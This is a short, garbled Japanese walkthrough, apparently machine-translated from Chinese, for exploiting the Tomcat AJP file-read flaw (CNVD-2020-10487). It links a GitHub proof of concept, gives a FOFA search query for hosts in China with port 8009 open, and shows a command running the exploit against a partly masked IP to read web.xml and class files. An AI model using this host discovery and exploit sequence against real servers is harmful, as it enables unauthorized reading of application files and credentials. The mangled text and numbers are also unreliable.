TomcatのAJPプロトコルにより実装に欠陥が原因関連のパラメータ制御、攻撃者は、サーバが読み込み、特定のパラメータを作成することにより、この脆弱性を悪用することができ、ディレクトリにwebappsに任意のファイルを、しかし、親ディレクトリに越えることはできません。
PoC来自GitHubのします。https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
最初のステップ:使用FOFA検索ポート8009
ポート= " 8009 " &&国= " CN "
ステップ2:実行するPoC
python2。7 CNVD- 2020年までに - 10487 -Tomcat-Ajp-lfi.py 151 * *。。。114 -p 8009 -f /WEB-INF/web.xml
1.読むのweb.xml
2.読む*の.classファイル